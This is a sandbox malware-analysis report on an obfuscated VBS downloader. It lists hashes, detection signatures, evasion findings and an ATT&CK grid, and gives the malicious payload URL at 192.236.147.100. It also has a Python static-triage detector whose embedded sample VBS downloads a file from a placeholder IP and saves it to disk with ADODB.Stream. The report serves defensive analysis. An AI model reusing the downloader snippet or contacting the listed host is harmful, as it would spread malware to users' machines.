
Analysis Report: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs

Overview

General Information

Sample Name: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs
MD5: 8491a619dc6e182437bd4482d6e97e3a
SHA1: 46d601a56103bf0a623d1c937eab41d8772de644
SHA256: 12ed08c4ea5ac7359ede532c672330bcc53589c2e6b932894b68cdf7788bac45

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Potential malicious VBS script found (has network functionality)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)

Startup

  • System is w10x64
  • wscript.exe (PID: 5768 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://192.236.147.100:1950/Inufturiols.iso | VirusTotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs | ReversingLabs: Detection: 12%
(Both ratios are low for a multi-scanner lookup; the score above rests on the behavioural signatures that follow, not on scanner consensus.)

Networking:

Potential malicious VBS script found (has network functionality)
Source: Initial file | BinaryStream.SaveToFile egilprrtbbdfiilnpprttvzzacbbddfhllnnprtt & "\" & hjnpttvbdffhjmoqqsvzzacbbdffhjmmoqssuegg, adSaveCreateOverWrite
(This is the ADODB.Stream SaveToFile call, adSaveCreateOverWrite being its overwrite flag. The destination path is assembled from two randomly named variables, so the drop location is not visible in the source without deobfuscating them.)
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 192.236.147.100
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown
Source: unknown | TCP traffic detected without corresponding DNS query: 192.236.147.100 (observed three times; the script carries the address as a literal, so no hostname is resolved and DNS-based detection never sees this contact)
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmp | String found in binary or memory: http://192.236.147.100:1950
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.1116629504.0000019FE4FD0000.00000004.00000040.sdmp, wscript.exe, 00000000.00000003.1114703153.0000019FE6DF0000.00000004.00000001.sdmp | String found in binary or memory: http://192.236.147.100:1950/Inufturiols.iso
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmp | String found in binary or memory: http://192.236.147.100:1950/Inufturiols.iso/
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmp | String found in binary or memory: http://192.236.147.100:1950/Inufturiols.isoU
Source: wscript.exe, 00000000.00000003.1114703153.0000019FE6DF0000.00000004.00000001.sdmp | String found in binary or memory: http://192.236.147.100:1950/Inufturiols.isoj
Source: wscript.exe, 00000000.00000003.1114464633.0000019FE4E18000.00000004.00000001.sdmp | String found in binary or memory: http://192.236.147.100:1950/Inufturiols.isoq
Source: wscript.exe, 00000000.00000003.1104699311.0000019FE4EAB000.00000004.00000001.sdmp | String found in binary or memory: http://192.236.147.100:1950/Inufturiols.isowFE
(The characters after ".iso" in the last four hits are adjacent memory bytes picked up by the string scan, not part of the URL; the indicator to block is http://192.236.147.100:1950/Inufturiols.iso.)
Source: wscript.exe, 00000000.00000002.1116155840.0000019FE4E8D000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com (no connection to this host was observed; the only network contact in the run was 192.236.147.100)

Data Obfuscation:

Java / VBScript file with very long strings (likely obfuscated code)
Source: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs | Initial sample: Strings found which are bigger than 50

System Summary:

Source: classification engine | Classification label: mal68.evad.winVBS@1/0@0/1
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\nvreadmm
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs'
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
(The Safer\CodeIdentifiers key is the Software Restriction Policies check wscript.exe makes before running any script, and the CLSID is the VBScript engine's; both are normal host activity rather than script behaviour. The file under AppData\Roaming was created but does not appear as a dropped file, consistent with the "dropped files: no activity detected" result below.)

Anti Debugging:

Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Program does not show much activity (idle)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.1116155840.0000019FE4E8D000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW2n
Source: wscript.exe, 00000000.00000002.1118207561.0000019FE6CB0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.1113989505.0000019FE4EC8000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1116155840.0000019FE4E8D000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW0]
Source: wscript.exe, 00000000.00000002.1118207561.0000019FE6CB0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.1118207561.0000019FE6CB0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.1118207561.0000019FE6CB0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
(The Hyper-V lines are Windows error-message text present in wscript.exe's memory; on their own they do not show that the script tested for a hypervisor. The WSH-Timer window together with the idle profile is the evasion evidence here: the script waits and does little visible work, so a short sandbox run can end before any payload stage.)

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 192.236.147.100 158
(The connection is made by wscript.exe itself, a signed Microsoft binary, so the traffic carries a trusted process name; no dropped payload was involved.)

Language, Device and Operating System Detection:

Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
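The Networking, Data Obfuscation and evasion signatures above all rest on features that can be checked statically before a file is sent to a sandbox: the ADODB.Stream SaveToFile write, a URL with a literal IP and port (hence no DNS query), string literals longer than 50 characters, and a timer or sleep. The Python below is an added example written for this page; it is not Joe Sandbox code and not the analysed script. The embedded VBS sample is constructed to mirror the report's observations (the documentation address 192.0.2.10 stands in for the real IP); the indicator regexes, the 50-character threshold borrowed from the report, and the use of WScript.Sleep as a static stand-in for the WSH-Timer window the sandbox saw at runtime are assumptions of the example.

```python
"""Static triage of a Windows Script Host (.vbs/.js) file for the indicators a
sandbox report of this kind flags. Added example for this page, not Joe Sandbox
code. SAMPLE_VBS is constructed for the demo and is not the analysed file."""
import re
from typing import Dict, List, Tuple

# Constructed sample: randomised variable names, ADODB.Stream save-to-disk,
# hardcoded IP:port URL, one long literal, a sleep. 192.0.2.10 is a
# documentation address, not the IP from the report.
SAMPLE_VBS = r'''
Set oXHR = CreateObject("MSXML2.XMLHTTP")
oXHR.Open "GET", "http://192.0.2.10:1950/Payload.iso", False
oXHR.Send
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oXHR.ResponseBody
BinaryStream.SaveToFile egilprrtbbdfiilnpprttvzzacbbddfhllnnprtt & "\" & hjnpttvbdffhjmoqqsvzzacbbdffhjmmoqssuegg, adSaveCreateOverWrite
WScript.Sleep 60000
blob = "aGVsbG8gd29ybGQgdGhpcyBpcyBhIHZlcnkgbG9uZyBzdHJpbmcgdGhhdCBsb29rcyBlbmNvZGVkIGFuZCBnb2VzIG9uIGFuZCBvbg=="
'''

# Objects/methods that give a script download-and-write-to-disk capability
# (assumed indicator list; extend for your environment).
NETWORK_API = re.compile(
    r"(MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream"
    r"|SaveToFile|URLDownloadToFile)", re.I)
# Literal IPv4 URL: contacted without any DNS query, as the report observed.
IP_URL = re.compile(
    r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?(/[^\s\"']*)?", re.I)
# Double-quoted literals; VBS has no backslash escapes, so this is exact.
STRING_LIT = re.compile(r'"([^"\n]*)"')
# Static stand-in for the WSH-Timer window seen at runtime (assumption).
TIMER = re.compile(r"(WScript\.Sleep|setTimeout|setInterval)", re.I)


def triage(source: str, long_string_threshold: int = 50) -> Dict[str, object]:
    """Return the indicators found in a VBS/JS source string.

    long_string_threshold mirrors the report's "strings bigger than 50" rule.
    """
    apis = sorted({m.group(1) for m in NETWORK_API.finditer(source)},
                  key=str.lower)
    ip_urls: List[Tuple[str, str, str]] = [
        (ip, port or "80", path or "/") for ip, port, path in IP_URL.findall(source)]
    long_strings = [s for s in STRING_LIT.findall(source)
                    if len(s) > long_string_threshold]
    has_timer = TIMER.search(source) is not None
    # A downloader needs both a fetch/write primitive and somewhere to fetch from;
    # either alone is reported but not flagged.
    downloader = bool(apis) and bool(ip_urls)
    return {
        "network_apis": apis,
        "ip_urls": ip_urls,
        "long_strings": long_strings,
        "has_timer": has_timer,
        "likely_downloader": downloader,
    }


def triage_file(path: str) -> Dict[str, object]:
    """Triage a script on disk. WSH files may be UTF-16 (BOM), UTF-8 or ANSI."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    else:
        try:
            text = raw.decode("utf-8-sig")
        except UnicodeDecodeError:
            text = raw.decode("cp1252", errors="replace")
    return triage(text)


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBS), indent=2))
```

Run the file directly to print the findings for the constructed sample as JSON, or call triage_file(path) on a script from disk. The check is deliberately coarse: it will not see indicators that the script builds at runtime from Chr() calls or concatenation, which is exactly what the long literals and random variable names in this sample hint at, so a clean static result is not a clean verdict.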

Mitre Att&ck Matrix

Digits following a technique name are the report's matched-signature counts, kept as printed; entries without a count are the unmatched grid placeholders shown for every tactic.

Initial Access: Valid Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Scripting (121), Service Execution, Windows Management Instrumentation, Scheduled Task
Persistence: Winlogon Helper DLL, Port Monitors, Accessibility Features, System Firmware
Privilege Escalation: Process Injection (1), Accessibility Features, Path Interception, DLL Search Order Hijacking
Defense Evasion: Masquerading (1), Process Injection (1), Scripting (121), Obfuscated Files or Information (1)
Credential Access: Credential Dumping, Network Sniffing, Input Capture, Credentials in Files
Discovery: Security Software Discovery (1), System Information Discovery (2), Query Registry, System Network Configuration Discovery
Lateral Movement: Application Deployment Software, Remote Services, Windows Remote Management, Logon Scripts
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture
Exfiltration: Data Compressed, Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted
Command and Control: Data Obfuscation, Fallback Channels, Custom Cryptographic Protocol, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Premium SMS Toll Fraud
Impact: Modify System Partition, Device Lockout, Delete Device Data
